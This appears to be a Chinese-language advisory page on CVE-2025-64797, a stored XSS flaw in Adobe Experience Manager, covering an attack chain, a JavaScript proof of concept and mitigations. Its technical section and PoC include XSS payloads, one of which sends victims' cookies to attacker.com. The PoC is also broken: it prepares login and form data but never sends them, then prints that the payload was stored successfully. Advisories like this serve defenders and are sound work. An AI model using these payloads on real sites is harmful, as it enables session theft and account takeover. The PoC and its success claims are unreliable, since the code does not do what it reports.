CVE-2025-64797 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64797

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64797是Adobe Experience Manager中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。攻击者利用该漏洞可以通过低权限账户向易受攻击的表单字段注入恶意JavaScript脚本。当其他用户浏览包含该恶意脚本的页面时，攻击者注入的代码将在受害者浏览器中执行，从而实现窃取会话令牌、劫持用户账户、修改页面内容或进行钓鱼攻击等恶意操作。由于该漏洞属于存储型XSS，恶意脚本被永久存储在服务器端，所有访问受影响页面的用户都会受到攻击影响。此漏洞的CVSS评分为5.4，属于中等严重程度，攻击复杂度低，但需要用户交互才能触发。Adobe官方已确认该漏洞并发布了安全公告APSB25-115，建议用户尽快升级到修复版本以消除安全风险。

技术细节

Adobe Experience Manager 6.5.23及更早版本在处理用户输入时存在存储型跨站脚本漏洞。漏洞根源在于应用程序未能对用户提交到表单字段的内容进行充分的输入验证和输出编码。攻击者（即使是低权限用户）可以在特定的表单输入字段中注入包含JavaScript代码的恶意payload。当这些数据被存储到服务器数据库并被其他用户访问时，浏览器会将其解析为HTML/JavaScript并执行。攻击者通常利用<img>、<script>、<iframe>等标签或事件处理器属性（如onerror、onload）来触发XSS。例如，攻击者可以在表单的文本字段中注入<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>等代码。当受害者访问包含该字段的页面时，其浏览器会执行这些恶意代码，从而导致会话cookie被盗或其他敏感信息泄露。防御此类漏洞需要在服务端对所有用户输入进行严格过滤，并在输出时进行适当的HTML实体编码。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Adobe Experience Manager版本，确认版本号<=6.5.23，并确定存在可利用的表单字段

STEP 2

步骤2: 账户获取

攻击者获取Adobe Experience Manager的低权限账户（如内容作者或普通用户权限）

STEP 3

步骤3: 恶意脚本注入

攻击者通过表单提交功能，向易受攻击的表单字段注入包含恶意JavaScript代码的payload，如<script>alert(document.cookie)</script>

STEP 4

步骤4: 持久化存储

恶意脚本被存储到服务器数据库中，由于是存储型XSS，payload会永久保存在系统中

STEP 5

步骤5: 受害者访问

当其他用户（受害者）访问包含该恶意字段的页面时，浏览器会从服务器获取并渲染页面内容

STEP 6

步骤6: 脚本执行

受害者的浏览器将页面中的恶意JavaScript代码作为合法脚本执行，导致cookie被盗、账户被劫持或其他恶意操作

STEP 7

步骤7: 数据窃取

攻击者通过外带数据（如将cookie发送到外部服务器）或直接在受害者浏览器中执行恶意操作来完成攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64797 Adobe Experience Manager Stored XSS PoC
// This PoC demonstrates how to inject malicious JavaScript into form fields

// Attacker's payload for stored XSS
const xssPayload = {
  // Method 1: Using script tag
  scriptTag: '<script>alert("XSS - CVE-2025-64797")</script>',
  
  // Method 2: Using img tag with onerror
  imgTag: '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">',
  
  // Method 3: Using iframe
  iframeTag: '<iframe src="javascript:alert(\'XSS\')">'
};

// Simulate sending the malicious payload to the vulnerable form field
async function exploitStoredXSS(baseUrl, formFieldId) {
  // Login as low-privilege user
  const loginUrl = `${baseUrl}/libs/granite/core/content/login.html`;
  const loginData = {
    '_username': 'low_priv_user',
    '_password': 'password',
    'j_username': 'low_priv_user',
    'j_password': 'password'
  };
  
  // Submit the form with XSS payload
  const formSubmitUrl = `${baseUrl}/content/forms/af/submit`;
  const formData = {
    [formFieldId]: xssPayload.scriptTag,
    './jcr:data': xssPayload.scriptTag
  };
  
  console.log('[+] Sending XSS payload to vulnerable field...');
  console.log('[+] Payload:', xssPayload.scriptTag);
  
  // When victim visits the page containing the malicious field,
  // the JavaScript will be executed in their browser
  console.log('[+] XSS payload stored successfully');
  console.log('[+] Any user viewing the affected page will trigger the payload');
}

// Example usage
// exploitStoredXSS('https://vulnerable-aem-server.com', 'userName');

影响范围

Adobe Experience Manager 6.5.23及更早版本

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制低权限用户对表单编辑功能的访问权限；2) 实施严格的输入验证规则，拒绝包含HTML/JavaScript标签的特殊字符；3) 在前端和后端同时对用户输入进行HTML实体编码；4) 部署Content Security Policy (CSP)响应头防止内联脚本执行；5) 监控和审计所有表单提交活动，检测异常的脚本注入行为；6) 对受影响页面实施访问控制，减少潜在受害者数量。